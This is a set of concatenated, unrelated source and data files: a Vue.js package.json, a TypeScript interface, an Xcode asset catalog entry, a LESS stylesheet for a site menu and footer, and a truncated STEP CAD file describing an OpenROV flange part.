"} {"text": "{\n \"name\": \"jokester\",\n \"description\": \"A Vue.js project\",\n \"version\": \"1.0.0\",\n \"author\": \"davidkatz <15Dkatz@shcp.edu>\",\n \"private\": true,\n \"scripts\": {\n \"dev\": \"cross-env NODE_ENV=development webpack-dev-server --open --hot\",\n \"build\": \"cross-env NODE_ENV=production webpack --progress --hide-modules\"\n },\n \"dependencies\": {\n \"vue\": \"^2.2.1\",\n \"vuex\": \"^2.2.1\"\n },\n \"devDependencies\": {\n \"babel-core\": \"^6.0.0\",\n \"babel-loader\": \"^6.0.0\",\n \"babel-preset-latest\": \"^6.0.0\",\n \"cross-env\": \"^3.0.0\",\n \"css-loader\": \"^0.25.0\",\n \"file-loader\": \"^0.9.0\",\n \"vue-loader\": \"^11.1.4\",\n \"vue-template-compiler\": \"^2.2.1\",\n \"webpack\": \"^2.2.0\",\n \"webpack-dev-server\": \"^2.2.0\"\n }\n}\n"} {"text": "export interface About {\n instance: {\n name: string\n shortDescription: string\n description: string\n terms: string\n\n codeOfConduct: string\n hardwareInformation: string\n\n creationReason: string\n moderationInformation: string\n administrator: string\n maintenanceLifetime: string\n businessModel: string\n\n languages: string[]\n categories: number[]\n }\n}\n"} {"text": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"zuovidoBtn.png\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"3x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}"} {"text": ".container,\n#main {\n position: relative;\n}\n\n#menu-off {\n position: absolute;\n top: 0;\n left: 100%;\n .transition(.4s);\n}\n\n#menu {\n position: fixed;\n top: 0;\n left: 0;\n bottom: 0;\n z-index: 66;\n width: @menuWidth;\n min-height: 100%;\n background: #fff;\n box-shadow: @boxShadow;\n .transition(.4s, cubic-bezier(.18, .81, .3, .89));\n will-change: transform, -webkit-transform;\n\n &.hide {\n .transform(translateX(-100%));\n #menu-off {\n .transform(scale(0));\n }\n +#main {\n padding-left: 0;\n }\n }\n\n .inner {\n position: relative;\n height: 100%;\n }\n\n .brand-wrap {\n background-size: 100% 100%;\n }\n\n .brand {\n padding: 40px @menuPadding 2em;\n background: fade(@primaryColor, 50%);\n }\n\n .avatar {\n display: block;\n width: 80px;\n height: 80px;\n border: 2px solid #fff;\n border-radius: 50%;\n overflow: hidden;\n box-shadow: @boxShadow;\n }\n\n .introduce {\n margin: 1em 0 0;\n color: @textPrimaryColor;\n }\n\n .mail {\n display: inline-block;\n padding-top: 4px;\n color: @lightPrimaryColor;\n font-size: 13px;\n }\n\n .scroll-wrap {\n position: relative;\n overflow-y: auto;\n }\n\n\n .nav {\n margin: 0;\n padding: 12px 0;\n height: 300px;\n min-height: ~\"calc(100% - 115px)\";\n list-style: none;\n line-height: @navH;\n\n li {\n padding: 0 @menuPadding;\n\n .icon {\n position: absolute;\n top: 0;\n left: @menuPadding;\n line-height: inherit;\n }\n\n &:hover,\n &.active {\n background: rgba(0, 0, 0, .05);\n\n a,\n .icon {\n color: @primaryColor;\n }\n }\n }\n\n a {\n display: block;\n padding-left: @menuPadding*2.4;\n height: @navH;\n line-height: @navH;\n font-weight: 500;\n color: @secondaryTextColor;\n text-decoration: none;\n }\n }\n}\n\n#main {\n padding-left: @menuWidth;\n min-height: 100%;\n .transition(.4s);\n}\n\n.body-wrap {\n padding: 30px 0 40px;\n min-height: ~'calc(100vh - 340px)';\n}\n\n.container {\n width: @contentWidth;\n margin: 0 auto;\n\n &:after {\n content: \"\";\n display: table;\n clear: both;\n }\n}\n\n.mask {\n visibility: hidden;\n position: fixed;\n top: 0;\n left: 
0;\n bottom: 0;\n z-index: 88;\n width: 100%;\n height: 100%;\n background: #000;\n opacity: 0;\n pointer-events: none;\n .transition(.3s);\n\n &.in {\n visibility: visible;\n pointer-events: auto;\n opacity: .3;\n }\n}\n\n.footer {\n color: rgba(255,255,255,.6);\n background: @darkPrimaryColor;\n p {\n margin: 0;\n line-height: 1.6;\n font-size: 13px;\n text-align: center;\n span {\n &:not(:first-child):before {\n content: \"·\";\n padding: 0 .5em;\n }\n }\n a {\n border-bottom: 1px dotted rgba(255,255,255,.5);\n &:hover {\n border-bottom: 1px solid rgba(255,255,255,.7);\n }\n }\n }\n\n .top {\n padding: 16px;\n background: @primaryColor;\n }\n a {\n color: inherit;\n opacity: .8;\n\n &:hover {\n color: #fff;\n text-decoration: none\n }\n }\n .bottom {\n padding: 16px;\n }\n}\n\na[title=\"站长统计\"] {\n display: none;\n}\n\n@media screen and (max-width:1240px) {\n #menu-off {\n display: none;\n }\n\n #menu {\n z-index: 99;\n box-shadow: none;\n .transform(translateX(-100%));\n\n &.show {\n .transform(translateX(0));\n }\n }\n\n #main {\n padding-left: 0;\n }\n}\n\n\n@media screen and (max-width:1040px) {\n .container {\n width: 100%;\n padding: 20px 16px;\n }\n}\n\n@media screen and (max-width:760px) {\n #main {\n width: 100%;\n overflow-x: hidden;\n }\n\n #menu {\n .brand {\n padding-top: 20px;\n padding-bottom: 1em;\n }\n\n .nav {\n line-height: @mNavH;\n\n a {\n height: @mNavH;\n line-height: @mNavH;\n }\n }\n }\n\n ::-webkit-scrollbar {\n display: none;\n }\n}\n\n"} {"text": "ISO-10303-21;\r\nHEADER;\r\n/* Generated by software containing ST-Developer\r\n * from STEP Tools, Inc. (www.steptools.com) \r\n */\r\n\r\nFILE_DESCRIPTION(\r\n/* description */ (''),\r\n/* implementation_level */ '2;1');\r\n\r\nFILE_NAME(\r\n/* name */ \r\n'D:\\\\OpenROV\\\\2.8\\\\Github Official\\\\STEP\\\\Electronics Tube\\\\Electronic\r\ns Endcaps\\\\Non Pass Through\\\\NPT Flange Inner.stp',\r\n/* time_stamp */ '2015-09-22T15:49:13-07:00',\r\n/* author */ ('Evil Brian'),\r\n/* organization */ (''),\r\n/* preprocessor_version */ 'ST-DEVELOPER v16.1',\r\n/* originating_system */ 'Autodesk Inventor 2016',\r\n/* authorisation */ '');\r\n\r\nFILE_SCHEMA (('AUTOMOTIVE_DESIGN { 1 0 10303 214 3 1 1 
}'));\r\nENDSEC;\r\n\r\nDATA;\r\n#10=MECHANICAL_DESIGN_GEOMETRIC_PRESENTATION_REPRESENTATION('',(#17,#18),\r\n#857);\r\n#11=SHAPE_REPRESENTATION_RELATIONSHIP('SRR','None',#866,#12);\r\n#12=ADVANCED_BREP_SHAPE_REPRESENTATION('',(#13),#856);\r\n#13=MANIFOLD_SOLID_BREP('Solid1',#503);\r\n#14=FACE_BOUND('',#61,.T.);\r\n#15=FACE_BOUND('',#81,.T.);\r\n#16=FACE_BOUND('',#86,.T.);\r\n#17=STYLED_ITEM('',(#876),#479);\r\n#18=STYLED_ITEM('',(#875),#13);\r\n#19=PLANE('',#508);\r\n#20=PLANE('',#509);\r\n#21=PLANE('',#524);\r\n#22=PLANE('',#527);\r\n#23=PLANE('',#530);\r\n#24=PLANE('',#533);\r\n#25=PLANE('',#536);\r\n#26=PLANE('',#539);\r\n#27=PLANE('',#542);\r\n#28=PLANE('',#545);\r\n#29=PLANE('',#548);\r\n#30=PLANE('',#551);\r\n#31=PLANE('',#556);\r\n#32=FACE_OUTER_BOUND('',#58,.T.);\r\n#33=FACE_OUTER_BOUND('',#59,.T.);\r\n#34=FACE_OUTER_BOUND('',#60,.T.);\r\n#35=FACE_OUTER_BOUND('',#62,.T.);\r\n#36=FACE_OUTER_BOUND('',#63,.T.);\r\n#37=FACE_OUTER_BOUND('',#64,.T.);\r\n#38=FACE_OUTER_BOUND('',#65,.T.);\r\n#39=FACE_OUTER_BOUND('',#66,.T.);\r\n#40=FACE_OUTER_BOUND('',#67,.T.);\r\n#41=FACE_OUTER_BOUND('',#68,.T.);\r\n#42=FACE_OUTER_BOUND('',#69,.T.);\r\n#43=FACE_OUTER_BOUND('',#70,.T.);\r\n#44=FACE_OUTER_BOUND('',#71,.T.);\r\n#45=FACE_OUTER_BOUND('',#72,.T.);\r\n#46=FACE_OUTER_BOUND('',#73,.T.);\r\n#47=FACE_OUTER_BOUND('',#74,.T.);\r\n#48=FACE_OUTER_BOUND('',#75,.T.);\r\n#49=FACE_OUTER_BOUND('',#76,.T.);\r\n#50=FACE_OUTER_BOUND('',#77,.T.);\r\n#51=FACE_OUTER_BOUND('',#78,.T.);\r\n#52=FACE_OUTER_BOUND('',#79,.T.);\r\n#53=FACE_OUTER_BOUND('',#80,.T.);\r\n#54=FACE_OUTER_BOUND('',#82,.T.);\r\n#55=FACE_OUTER_BOUND('',#83,.T.);\r\n#56=FACE_OUTER_BOUND('',#84,.T.);\r\n#57=FACE_OUTER_BOUND('',#85,.T.);\r\n#58=EDGE_LOOP('',(#322,#323,#324,#325));\r\n#59=EDGE_LOOP('',(#326,#327,#328,#329));\r\n#60=EDGE_LOOP('',(#330,#331,#332,#333,#334,#335,#336,#337,#338,#339,#340,\r\n#341,#342,#343,#344,#345,#346,#347,#348,#349,#350,#351,#352));\r\n#61=EDGE_LOOP('',(#353));\r\n#62=EDGE_LOOP('',(#354,#355,#356,#357));\r\n#63=EDGE_LOOP('',(#358,#359,#360,#361));\r\n#64=EDGE_LOOP('',(#362,#363,#364,#365));\r\n#65=EDGE_LOOP('',(#366,#367,#368,#369));\r\n#66=EDGE_LOOP('',(#370,#371,#372,#373));\r\n#67=EDGE_LOOP('',(#374,#375,#376,#377));\r\n#68=EDGE_LOOP('',(#378,#379,#380,#381));\r\n#69=EDGE_LOOP('',(#382,#383,#384,#385));\r\n#70=EDGE_LOOP('',(#386,#387,#388,#389));\r\n#71=EDGE_LOOP('',(#390,#391,#392,#393));\r\n#72=EDGE_LOOP('',(#394,#395,#396,#397));\r\n#73=EDGE_LOOP('',(#398,#399,#400,#401));\r\n#74=EDGE_LOOP('',(#402,#403,#404,#405));\r\n#75=EDGE_LOOP('',(#406,#407,#408,#409));\r\n#76=EDGE_LOOP('',(#410,#411,#412,#413));\r\n#77=EDGE_LOOP('',(#414,#415,#416,#417));\r\n#78=EDGE_LOOP('',(#418,#419,#420,#421));\r\n#79=EDGE_LOOP('',(#422,#423,#424,#425));\r\n#80=EDGE_LOOP('',(#426));\r\n#81=EDGE_LOOP('',(#427));\r\n#82=EDGE_LOOP('',(#428,#429,#430,#431));\r\n#83=EDGE_LOOP('',(#432,#433,#434,#435));\r\n#84=EDGE_LOOP('',(#436,#437,#438,#439));\r\n#85=EDGE_LOOP('',(#440,#441,#442,#443,#444,#445,#446,#447,#448,#449,#450,\r\n#451,#452,#453,#454,#455,#456,#457,#458,#459,#460,#461,#462));\r\n#86=EDGE_LOOP('',(#463));\r\n#87=LINE('',#714,#132);\r\n#88=LINE('',#717,#133);\r\n#89=LINE('',#720,#134);\r\n#90=LINE('',#722,#135);\r\n#91=LINE('',#723,#136);\r\n#92=LINE('',#726,#137);\r\n#93=LINE('',#730,#138);\r\n#94=LINE('',#734,#139);\r\n#95=LINE('',#738,#140);\r\n#96=LINE('',#742,#141);\r\n#97=LINE('',#748,#142);\r\n#98=LINE('',#752,#143);\r\n#99=LINE('',#756,#144);\r\n#100=LINE('',#760,#145);\r\n#101=LINE('',#764,#146);\r\n#102=LINE('',#771,#147)
;\r\n#103=LINE('',#774,#148);\r\n#104=LINE('',#775,#149);\r\n#105=LINE('',#779,#150);\r\n#106=LINE('',#782,#151);\r\n#107=LINE('',#783,#152);\r\n#108=LINE('',#788,#153);\r\n#109=LINE('',#789,#154);\r\n#110=LINE('',#792,#155);\r\n#111=LINE('',#793,#156);\r\n#112=LINE('',#798,#157);\r\n#113=LINE('',#799,#158);\r\n#114=LINE('',#801,#159);\r\n#115=LINE('',#806,#160);\r\n#116=LINE('',#807,#161);\r\n#117=LINE('',#810,#162);\r\n#118=LINE('',#811,#163);\r\n#119=LINE('',#814,#164);\r\n#120=LINE('',#817,#165);\r\n#121=LINE('',#819,#166);\r\n#122=LINE('',#822,#167);\r\n#123=LINE('',#825,#168);\r\n#124=LINE('',#827,#169);\r\n#125=LINE('',#830,#170);\r\n#126=LINE('',#833,#171);\r\n#127=LINE('',#835,#172);\r\n#128=LINE('',#838,#173);\r\n#129=LINE('',#841,#174);\r\n#130=LINE('',#846,#175);\r\n#131=LINE('',#850,#176);\r\n#132=VECTOR('',#563,1.5);\r\n#133=VECTOR('',#566,1.5);\r\n#134=VECTOR('',#569,90.4989623089514);\r\n#135=VECTOR('',#570,1.5);\r\n#136=VECTOR('',#571,90.4989623089514);\r\n#137=VECTOR('',#574,29.);\r\n#138=VECTOR('',#577,4.5);\r\n#139=VECTOR('',#580,11.);\r\n#140=VECTOR('',#583,4.50000000000001);\r\n#141=VECTOR('',#586,10.);\r\n#142=VECTOR('',#591,22.);\r\n#143=VECTOR('',#594,1.49999999999999);\r\n#144=VECTOR('',#597,11.);\r\n#145=VECTOR('',#600,0.810810192574953);\r\n#146=VECTOR('',#603,32.3170363388663);\r\n#147=VECTOR('',#612,1.5);\r\n#148=VECTOR('',#615,1.5);\r\n#149=VECTOR('',#616,32.3170363388663);\r\n#150=VECTOR('',#621,1.5);\r\n#151=VECTOR('',#624,1.5);\r\n#152=VECTOR('',#625,0.810810192574953);\r\n#153=VECTOR('',#630,1.5);\r\n#154=VECTOR('',#631,1.5);\r\n#155=VECTOR('',#634,1.5);\r\n#156=VECTOR('',#635,22.);\r\n#157=VECTOR('',#640,1.5);\r\n#158=VECTOR('',#641,1.5);\r\n#159=VECTOR('',#644,29.);\r\n#160=VECTOR('',#649,1.5);\r\n#161=VECTOR('',#650,1.5);\r\n#162=VECTOR('',#653,10.);\r\n#163=VECTOR('',#654,1.5);\r\n#164=VECTOR('',#657,1.5);\r\n#165=VECTOR('',#660,1.5);\r\n#166=VECTOR('',#663,4.5);\r\n#167=VECTOR('',#666,1.5);\r\n#168=VECTOR('',#669,1.5);\r\n#169=VECTOR('',#672,11.);\r\n#170=VECTOR('',#675,1.5);\r\n#171=VECTOR('',#678,1.5);\r\n#172=VECTOR('',#681,1.49999999999999);\r\n#173=VECTOR('',#684,1.5);\r\n#174=VECTOR('',#689,11.);\r\n#175=VECTOR('',#696,4.50000000000001);\r\n#176=VECTOR('',#701,1.5);\r\n#177=CIRCLE('',#506,5.);\r\n#178=CIRCLE('',#507,5.);\r\n#179=CIRCLE('',#510,1.);\r\n#180=CIRCLE('',#511,0.5);\r\n#181=CIRCLE('',#512,0.5);\r\n#182=CIRCLE('',#513,1.);\r\n#183=CIRCLE('',#514,57.);\r\n#184=CIRCLE('',#515,20.);\r\n#185=CIRCLE('',#516,1.);\r\n#186=CIRCLE('',#517,0.5);\r\n#187=CIRCLE('',#518,0.5);\r\n#188=CIRCLE('',#519,1.);\r\n#189=CIRCLE('',#520,5.);\r\n#190=CIRCLE('',#521,10.);\r\n#191=CIRCLE('',#523,5.);\r\n#192=CIRCLE('',#526,1.);\r\n#193=CIRCLE('',#529,1.);\r\n#194=CIRCLE('',#532,1.);\r\n#195=CIRCLE('',#535,1.);\r\n#196=CIRCLE('',#538,0.5);\r\n#197=CIRCLE('',#541,0.5);\r\n#198=CIRCLE('',#544,0.5);\r\n#199=CIRCLE('',#547,0.5);\r\n#200=CIRCLE('',#550,10.);\r\n#201=CIRCLE('',#553,57.);\r\n#202=CIRCLE('',#555,20.);\r\n#203=VERTEX_POINT('',#710);\r\n#204=VERTEX_POINT('',#711);\r\n#205=VERTEX_POINT('',#713);\r\n#206=VERTEX_POINT('',#715);\r\n#207=VERTEX_POINT('',#719);\r\n#208=VERTEX_POINT('',#721);\r\n#209=VERTEX_POINT('',#725);\r\n#210=VERTEX_POINT('',#727);\r\n#211=VERTEX_POINT('',#729);\r\n#212=VERTEX_POINT('',#731);\r\n#213=VERTEX_POINT('',#733);\r\n#214=VERTEX_POINT('',#735);\r\n#215=VERTEX_POINT('',#737);\r\n#216=VERTEX_POINT('',#739);\r\n#217=VERTEX_POINT('',#741);\r\n#218=VERTEX_POINT('',#743);\r\n#219=VERTEX_POINT('',#745);\r\n#220=VERTEX_POINT('',#747);\r\n#
221=VERTEX_POINT('',#749);\r\n#222=VERTEX_POINT('',#751);\r\n#223=VERTEX_POINT('',#753);\r\n#224=VERTEX_POINT('',#755);\r\n#225=VERTEX_POINT('',#757);\r\n#226=VERTEX_POINT('',#759);\r\n#227=VERTEX_POINT('',#761);\r\n#228=VERTEX_POINT('',#763);\r\n#229=VERTEX_POINT('',#766);\r\n#230=VERTEX_POINT('',#769);\r\n#231=VERTEX_POINT('',#773);\r\n#232=VERTEX_POINT('',#777);\r\n#233=VERTEX_POINT('',#781);\r\n#234=VERTEX_POINT('',#785);\r\n#235=VERTEX_POINT('',#786);\r\n#236=VERTEX_POINT('',#791);\r\n#237=VERTEX_POINT('',#795);\r\n#238=VERTEX_POINT('',#796);\r\n#239=VERTEX_POINT('',#803);\r\n#240=VERTEX_POINT('',#804);\r\n#241=VERTEX_POINT('',#809);\r\n#242=VERTEX_POINT('',#813);\r\n#243=VERTEX_POINT('',#815);\r\n#244=VERTEX_POINT('',#821);\r\n#245=VERTEX_POINT('',#823);\r\n#246=VERTEX_POINT('',#829);\r\n#247=VERTEX_POINT('',#831);\r\n#248=VERTEX_POINT('',#837);\r\n#249=VERTEX_POINT('',#843);\r\n#250=VERTEX_POINT('',#848);\r\n#251=EDGE_CURVE('',#203,#204,#177,.T.);\r\n#252=EDGE_CURVE('',#204,#205,#87,.T.);\r\n#253=EDGE_CURVE('',#205,#206,#178,.T.);\r\n#254=EDGE_CURVE('',#206,#203,#88,.T.);\r\n#255=EDGE_CURVE('',#206,#207,#89,.T.);\r\n#256=EDGE_CURVE('',#208,#207,#90,.T.);\r\n#257=EDGE_CURVE('',#203,#208,#91,.T.);\r\n#258=EDGE_CURVE('',#209,#205,#92,.T.);\r\n#259=EDGE_CURVE('',#210,#209,#179,.T.);\r\n#260=EDGE_CURVE('',#211,#210,#93,.T.);\r\n#261=EDGE_CURVE('',#212,#211,#180,.T.);\r\n#262=EDGE_CURVE('',#213,#212,#94,.T.);\r\n#263=EDGE_CURVE('',#214,#213,#181,.T.);\r\n#264=EDGE_CURVE('',#215,#214,#95,.T.);\r\n#265=EDGE_CURVE('',#216,#215,#182,.T.);\r\n#266=EDGE_CURVE('',#217,#216,#96,.T.);\r\n#267=EDGE_CURVE('',#218,#217,#183,.T.);\r\n#268=EDGE_CURVE('',#219,#218,#184,.T.);\r\n#269=EDGE_CURVE('',#220,#219,#97,.T.);\r\n#270=EDGE_CURVE('',#221,#220,#185,.T.);\r\n#271=EDGE_CURVE('',#222,#221,#98,.T.);\r\n#272=EDGE_CURVE('',#223,#222,#186,.T.);\r\n#273=EDGE_CURVE('',#224,#223,#99,.T.);\r\n#274=EDGE_CURVE('',#225,#224,#187,.T.);\r\n#275=EDGE_CURVE('',#226,#225,#100,.T.);\r\n#276=EDGE_CURVE('',#227,#226,#188,.T.);\r\n#277=EDGE_CURVE('',#228,#227,#101,.T.);\r\n#278=EDGE_CURVE('',#207,#228,#189,.T.);\r\n#279=EDGE_CURVE('',#229,#229,#190,.T.);\r\n#280=EDGE_CURVE('',#230,#208,#191,.T.);\r\n#281=EDGE_CURVE('',#228,#230,#102,.T.);\r\n#282=EDGE_CURVE('',#231,#227,#103,.T.);\r\n#283=EDGE_CURVE('',#230,#231,#104,.T.);\r\n#284=EDGE_CURVE('',#232,#231,#192,.T.);\r\n#285=EDGE_CURVE('',#226,#232,#105,.T.);\r\n#286=EDGE_CURVE('',#233,#225,#106,.T.);\r\n#287=EDGE_CURVE('',#232,#233,#107,.T.);\r\n#288=EDGE_CURVE('',#234,#235,#193,.T.);\r\n#289=EDGE_CURVE('',#235,#221,#108,.T.);\r\n#290=EDGE_CURVE('',#220,#234,#109,.T.);\r\n#291=EDGE_CURVE('',#219,#236,#110,.T.);\r\n#292=EDGE_CURVE('',#234,#236,#111,.T.);\r\n#293=EDGE_CURVE('',#237,#238,#194,.T.);\r\n#294=EDGE_CURVE('',#238,#210,#112,.T.);\r\n#295=EDGE_CURVE('',#209,#237,#113,.T.);\r\n#296=EDGE_CURVE('',#237,#204,#114,.T.);\r\n#297=EDGE_CURVE('',#239,#240,#195,.T.);\r\n#298=EDGE_CURVE('',#240,#216,#115,.T.);\r\n#299=EDGE_CURVE('',#215,#239,#116,.T.);\r\n#300=EDGE_CURVE('',#241,#240,#117,.T.);\r\n#301=EDGE_CURVE('',#217,#241,#118,.T.);\r\n#302=EDGE_CURVE('',#211,#242,#119,.T.);\r\n#303=EDGE_CURVE('',#242,#243,#196,.T.);\r\n#304=EDGE_CURVE('',#243,#212,#120,.T.);\r\n#305=EDGE_CURVE('',#242,#238,#121,.T.);\r\n#306=EDGE_CURVE('',#213,#244,#122,.T.);\r\n#307=EDGE_CURVE('',#244,#245,#197,.T.);\r\n#308=EDGE_CURVE('',#245,#214,#123,.T.);\r\n#309=EDGE_CURVE('',#244,#243,#124,.T.);\r\n#310=EDGE_CURVE('',#222,#246,#125,.T.);\r\n#311=EDGE_CURVE('',#246,#247,#198,.T.);\r\n#312=EDGE_CURVE(
'',#247,#223,#126,.T.);\r\n#313=EDGE_CURVE('',#246,#235,#127,.T.);\r\n#314=EDGE_CURVE('',#224,#248,#128,.T.);\r\n#315=EDGE_CURVE('',#248,#233,#199,.T.);\r\n#316=EDGE_CURVE('',#248,#247,#129,.T.);\r\n#317=EDGE_CURVE('',#249,#249,#200,.T.);\r\n#318=EDGE_CURVE('',#239,#245,#130,.T.);\r\n#319=EDGE_CURVE('',#250,#241,#201,.T.);\r\n#320=EDGE_CURVE('',#218,#250,#131,.T.);\r\n#321=EDGE_CURVE('',#236,#250,#202,.T.);\r\n#322=ORIENTED_EDGE('',*,*,#251,.T.);\r\n#323=ORIENTED_EDGE('',*,*,#252,.T.);\r\n#324=ORIENTED_EDGE('',*,*,#253,.T.);\r\n#325=ORIENTED_EDGE('',*,*,#254,.T.);\r\n#326=ORIENTED_EDGE('',*,*,#254,.F.);\r\n#327=ORIENTED_EDGE('',*,*,#255,.T.);\r\n#328=ORIENTED_EDGE('',*,*,#256,.F.);\r\n#329=ORIENTED_EDGE('',*,*,#257,.F.);\r\n#330=ORIENTED_EDGE('',*,*,#253,.F.);\r\n#331=ORIENTED_EDGE('',*,*,#258,.F.);\r\n#332=ORIENTED_EDGE('',*,*,#259,.F.);\r\n#333=ORIENTED_EDGE('',*,*,#260,.F.);\r\n#334=ORIENTED_EDGE('',*,*,#261,.F.);\r\n#335=ORIENTED_EDGE('',*,*,#262,.F.);\r\n#336=ORIENTED_EDGE('',*,*,#263,.F.);\r\n#337=ORIENTED_EDGE('',*,*,#264,.F.);\r\n#338=ORIENTED_EDGE('',*,*,#265,.F.);\r\n#339=ORIENTED_EDGE('',*,*,#266,.F.);\r\n#340=ORIENTED_EDGE('',*,*,#267,.F.);\r\n#341=ORIENTED_EDGE('',*,*,#268,.F.);\r\n#342=ORIENTED_EDGE('',*,*,#269,.F.);\r\n#343=ORIENTED_EDGE('',*,*,#270,.F.);\r\n#344=ORIENTED_EDGE('',*,*,#271,.F.);\r\n#345=ORIENTED_EDGE('',*,*,#272,.F.);\r\n#346=ORIENTED_EDGE('',*,*,#273,.F.);\r\n#347=ORIENTED_EDGE('',*,*,#274,.F.);\r\n#348=ORIENTED_EDGE('',*,*,#275,.F.);\r\n#349=ORIENTED_EDGE('',*,*,#276,.F.);\r\n#350=ORIENTED_EDGE('',*,*,#277,.F.);\r\n#351=ORIENTED_EDGE('',*,*,#278,.F.);\r\n#352=ORIENTED_EDGE('',*,*,#255,.F.);\r\n#353=ORIENTED_EDGE('',*,*,#279,.T.);\r\n#354=ORIENTED_EDGE('',*,*,#280,.T.);\r\n#355=ORIENTED_EDGE('',*,*,#256,.T.);\r\n#356=ORIENTED_EDGE('',*,*,#278,.T.);\r\n#357=ORIENTED_EDGE('',*,*,#281,.T.);\r\n#358=ORIENTED_EDGE('',*,*,#281,.F.);\r\n#359=ORIENTED_EDGE('',*,*,#277,.T.);\r\n#360=ORIENTED_EDGE('',*,*,#282,.F.);\r\n#361=ORIENTED_EDGE('',*,*,#283,.F.);\r\n#362=ORIENTED_EDGE('',*,*,#284,.T.);\r\n#363=ORIENTED_EDGE('',*,*,#282,.T.);\r\n#364=ORIENTED_EDGE('',*,*,#276,.T.);\r\n#365=ORIENTED_EDGE('',*,*,#285,.T.);\r\n#366=ORIENTED_EDGE('',*,*,#285,.F.);\r\n#367=ORIENTED_EDGE('',*,*,#275,.T.);\r\n#368=ORIENTED_EDGE('',*,*,#286,.F.);\r\n#369=ORIENTED_EDGE('',*,*,#287,.F.);\r\n#370=ORIENTED_EDGE('',*,*,#288,.T.);\r\n#371=ORIENTED_EDGE('',*,*,#289,.T.);\r\n#372=ORIENTED_EDGE('',*,*,#270,.T.);\r\n#373=ORIENTED_EDGE('',*,*,#290,.T.);\r\n#374=ORIENTED_EDGE('',*,*,#290,.F.);\r\n#375=ORIENTED_EDGE('',*,*,#269,.T.);\r\n#376=ORIENTED_EDGE('',*,*,#291,.T.);\r\n#377=ORIENTED_EDGE('',*,*,#292,.F.);\r\n#378=ORIENTED_EDGE('',*,*,#293,.T.);\r\n#379=ORIENTED_EDGE('',*,*,#294,.T.);\r\n#380=ORIENTED_EDGE('',*,*,#259,.T.);\r\n#381=ORIENTED_EDGE('',*,*,#295,.T.);\r\n#382=ORIENTED_EDGE('',*,*,#252,.F.);\r\n#383=ORIENTED_EDGE('',*,*,#296,.F.);\r\n#384=ORIENTED_EDGE('',*,*,#295,.F.);\r\n#385=ORIENTED_EDGE('',*,*,#258,.T.);\r\n#386=ORIENTED_EDGE('',*,*,#297,.T.);\r\n#387=ORIENTED_EDGE('',*,*,#298,.T.);\r\n#388=ORIENTED_EDGE('',*,*,#265,.T.);\r\n#389=ORIENTED_EDGE('',*,*,#299,.T.);\r\n#390=ORIENTED_EDGE('',*,*,#298,.F.);\r\n#391=ORIENTED_EDGE('',*,*,#300,.F.);\r\n#392=ORIENTED_EDGE('',*,*,#301,.F.);\r\n#393=ORIENTED_EDGE('',*,*,#266,.T.);\r\n#394=ORIENTED_EDGE('',*,*,#261,.T.);\r\n#395=ORIENTED_EDGE('',*,*,#302,.T.);\r\n#396=ORIENTED_EDGE('',*,*,#303,.T.);\r\n#397=ORIENTED_EDGE('',*,*,#304,.T.);\r\n#398=ORIENTED_EDGE('',*,*,#294,.F.);\r\n#399=ORIENTED_EDGE('',*,*,#305,.F.);\r\n#400=ORIENTED_EDGE(''
,*,*,#302,.F.);\r\n#401=ORIENTED_EDGE('',*,*,#260,.T.);\r\n#402=ORIENTED_EDGE('',*,*,#263,.T.);\r\n#403=ORIENTED_EDGE('',*,*,#306,.T.);\r\n#404=ORIENTED_EDGE('',*,*,#307,.T.);\r\n#405=ORIENTED_EDGE('',*,*,#308,.T.);\r\n#406=ORIENTED_EDGE('',*,*,#304,.F.);\r\n#407=ORIENTED_EDGE('',*,*,#309,.F.);\r\n#408=ORIENTED_EDGE('',*,*,#306,.F.);\r\n#409=ORIENTED_EDGE('',*,*,#262,.T.);\r\n#410=ORIENTED_EDGE('',*,*,#272,.T.);\r\n#411=ORIENTED_EDGE('',*,*,#310,.T.);\r\n#412=ORIENTED_EDGE('',*,*,#311,.T.);\r\n#413=ORIENTED_EDGE('',*,*,#312,.T.);\r\n#414=ORIENTED_EDGE('',*,*,#289,.F.);\r\n#415=ORIENTED_EDGE('',*,*,#313,.F.);\r\n#416=ORIENTED_EDGE('',*,*,#310,.F.);\r\n#417=ORIENTED_EDGE('',*,*,#271,.T.);\r\n#418=ORIENTED_EDGE('',*,*,#274,.T.);\r\n#419=ORIENTED_EDGE('',*,*,#314,.T.);\r\n#420=ORIENTED_EDGE('',*,*,#315,.T.);\r\n#421=ORIENTED_EDGE('',*,*,#286,.T.);\r\n#422=ORIENTED_EDGE('',*,*,#312,.F.);\r\n#423=ORIENTED_EDGE('',*,*,#316,.F.);\r\n#424=ORIENTED_EDGE('',*,*,#314,.F.);\r\n#425=ORIENTED_EDGE('',*,*,#273,.T.);\r\n#426=ORIENTED_EDGE('',*,*,#317,.F.);\r\n#427=ORIENTED_EDGE('',*,*,#279,.F.);\r\n#428=ORIENTED_EDGE('',*,*,#299,.F.);\r\n#429=ORIENTED_EDGE('',*,*,#264,.T.);\r\n#430=ORIENTED_EDGE('',*,*,#308,.F.);\r\n#431=ORIENTED_EDGE('',*,*,#318,.F.);\r\n#432=ORIENTED_EDGE('',*,*,#267,.T.);\r\n#433=ORIENTED_EDGE('',*,*,#301,.T.);\r\n#434=ORIENTED_EDGE('',*,*,#319,.F.);\r\n#435=ORIENTED_EDGE('',*,*,#320,.F.);\r\n#436=ORIENTED_EDGE('',*,*,#268,.T.);\r\n#437=ORIENTED_EDGE('',*,*,#320,.T.);\r\n#438=ORIENTED_EDGE('',*,*,#321,.F.);\r\n#439=ORIENTED_EDGE('',*,*,#291,.F.);\r\n#440=ORIENTED_EDGE('',*,*,#251,.F.);\r\n#441=ORIENTED_EDGE('',*,*,#257,.T.);\r\n#442=ORIENTED_EDGE('',*,*,#280,.F.);\r\n#443=ORIENTED_EDGE('',*,*,#283,.T.);\r\n#444=ORIENTED_EDGE('',*,*,#284,.F.);\r\n#445=ORIENTED_EDGE('',*,*,#287,.T.);\r\n#446=ORIENTED_EDGE('',*,*,#315,.F.);\r\n#447=ORIENTED_EDGE('',*,*,#316,.T.);\r\n#448=ORIENTED_EDGE('',*,*,#311,.F.);\r\n#449=ORIENTED_EDGE('',*,*,#313,.T.);\r\n#450=ORIENTED_EDGE('',*,*,#288,.F.);\r\n#451=ORIENTED_EDGE('',*,*,#292,.T.);\r\n#452=ORIENTED_E